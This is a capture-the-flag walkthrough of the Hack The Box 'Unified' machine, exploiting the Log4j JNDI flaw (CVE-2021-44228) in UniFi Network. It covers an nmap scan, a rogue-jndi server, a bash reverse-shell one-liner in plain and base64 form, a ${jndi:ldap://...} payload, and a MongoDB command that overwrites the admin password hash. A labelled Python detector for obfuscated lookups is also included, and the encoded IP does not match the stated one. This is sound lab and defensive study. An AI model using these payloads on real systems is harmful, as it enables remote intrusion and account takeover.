Hack The Box - Unified: Apache Log4j Remote Code Execution (CVE-2021-44228)

While playing Hack The Box I ran into a JNDI injection CVE that felt classic enough to jot down. It is the Apache Log4j remote code execution vulnerability (CVE-2021-44228) disclosed at the end of last year.

nmap -sS -Pn -T4 -p1-10000 -A 10.129.105.187

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 28 Mar 2022 13:13:43 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 404
| Foundtitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 404
| Foundh1>body>html>
| GetRequest, HTTPOptions:
| HTTP/1.1 302
| Location: http://localhost:8080/manage
| Content-Length: 0
| Date: Mon, 28 Mar 2022 13:13:38 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:39 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:43 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>
|_http-title: Did not follow redirect to https://10.129.105.187:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open ssl/nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8843/tcp open ssl/unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:03 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| HTTPOptions:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:05 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:14:06 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8880/tcp open cddbp-alt?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 28 Mar 2022 13:13:39 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 404
| Foundtitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 404
| Foundh1>body>html>
| GetRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:38 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
| Requesth1>body>html>
| HTTPOptions:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 28 Mar 2022 13:13:45 GMT
| Connection: close
| <html lang="en"><head><title>HTTP Status 400
| Requesttitle><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}style>head><body><h1>HTTP Status 400
|_ Requesth1>body>html>

Out of habit I first tried a few weak passwords over SSH and moved on; 6789 would not open in a browser and the service is unknown, so I skipped it for now; browsing to 8080 redirected to 8443. And so the main character takes the stage:

UniFi Network version 6.4.54, which has the publicly disclosed Apache Log4j remote code execution vulnerability CVE-2021-44228; in practice this is JNDI injection.

For the details of how the vulnerability arises, see https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi

In this box the vulnerable input is the remember field. I originally wanted to be lazy and try it without setting up a local LDAP server, mainly because switching Java versions is a pain. In the end there was no avoiding it.

Setting up the JNDI server environment:

git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package

Maven also needs to be installed:

sudo apt install maven
mvn package

Then Base64-encode the payload. Port 4444 is a matter of preference; it is the port the reverse shell connects back to. By default the tool starts an HTTP service on 8000 and an LDAP service on 1389.

echo 'bash -c bash -i >&/dev/tcp/10.10.14.74/4444 0>&1' | base64

Using that Base64 output, build the command in rogue-jndi:

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" --hostname "10.10.14.74"

Then listen locally on 4444 and resend the request in Burp Suite with the following lookup in the remember field; the shell connects back.

${jndi:ldap://eb0uvi.dnslog.cn:1389/o=tomcat}
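As the defender's counterpart to the lookup string above, here is an added Python example (my own code for this edit, not part of the original writeup and not UniFi or Log4j code) that scans captured login request bodies for the Log4j lookup pattern. It folds the `${lower:..}`, `${upper:..}` and `${..:-default}` nesting that is commonly used to disguise the `jndi:` keyword, then matches the normalised string. The field names follow the UniFi login API; every address and value in the sample bodies is constructed.

```python
import json
import re

# Constructed sample login bodies for the UniFi /api/login endpoint. The field names
# (username, password, remember) are those of the real API; every value below is made up.
SAMPLE_BODIES = [
    '{"username": "alice", "password": "hunter2", "remember": true}',
    '{"username": "bob", "password": "x", "remember": "${jndi:ldap://10.0.0.5:1389/o=tomcat}"}',
    '{"username": "eve", "password": "x", "remember": "${${lower:j}${upper:n}di:rmi://evil.example/a}"}',
    '{"username": "mallory", "password": "x", "remember": "${${env:NOPE:-j}ndi:dns://x.example/a}"}',
]

# An innermost lookup ${name:arg}: the argument contains no further ${ }.
_INNER = re.compile(r"\$\{(?P<name>[A-Za-z]+):(?P<arg>[^${}]*)\}")
# A lookup with a default, ${anything:-value}: Log4j substitutes 'value' when the lookup fails.
_DEFAULT = re.compile(r"\$\{[^${}]*:-(?P<val>[^${}]*)\}")
# What remains to be matched once the disguises have been folded away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(value: str, max_rounds: int = 20) -> str:
    """Collapse lower/upper and default-value lookups nested inside a string, working
    inside-out, until a pass changes nothing (or max_rounds is reached)."""
    def fold(m):
        name, arg = m.group("name").lower(), m.group("arg")
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
        return m.group(0)  # any other lookup (including jndi itself) is left as-is

    for _ in range(max_rounds):
        folded = _DEFAULT.sub(lambda m: m.group("val"), value)
        folded = _INNER.sub(fold, folded)
        if folded == value:
            break
        value = folded
    return value


def _strings(obj, path=""):
    """Yield (json_path, string) for every string leaf of a decoded JSON value."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _strings(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _strings(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def find_jndi_lookups(body: str):
    """Return [(field, normalised_value)] for every string field of a request body that
    carries a JNDI lookup. A body that is not JSON is scanned as one raw string."""
    try:
        fields = list(_strings(json.loads(body)))
    except ValueError:
        fields = [("<raw>", body)]
    hits = []
    for field, value in fields:
        norm = normalize(value)
        if _JNDI.search(norm):
            hits.append((field, norm))
    return hits


def scan(bodies):
    """Map body index -> hits for every body that contains at least one lookup."""
    return {i: h for i, b in enumerate(bodies) if (h := find_jndi_lookups(b))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_BODIES).items():
        for field, value in hits:
            print(f"body {i}: JNDI lookup in field {field!r}: {value}")
```

The normalisation step is what makes the check worth more than a plain `grep jndi`: the second and third sample bodies never contain the literal keyword, yet both fold to a `${jndi:...}` string. Matching on the request body rather than on the application log also catches the case where the lookup was already evaluated and never reached the log in its original form.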

Upgrade the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

User flag obtained.

Then, following the official guided questions, I found a MongoDB database on port 27117:

ps aux | grep mongo

Then I tried to extract the administrator password and found it was hashed. But the admin password can be overwritten with an update, so generate a new hash and copy it in:

mkpasswd -m sha-512 Password1234

$6$sbnjIZBtmRds.L/E$fEKZhosqeHykiVWT1IBGju43WdVdDauv5RsvIPifi32CC2TTNU8kHOd2ToaW8fIX7XXM8P5Z8j4NB1gJGTONl1

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$sbnjIZBtmRds.L/E$fEKZhosqeHykiVWT1IBGju43WdVdDauv5RsvIPifi32CC2TTNU8kHOd2ToaW8fIX7XXM8P5Z8j4NB1gJGTONl1"}})'

Then log in on the web UI:

Then find the root password under settings:

SSH in to get the root flag:
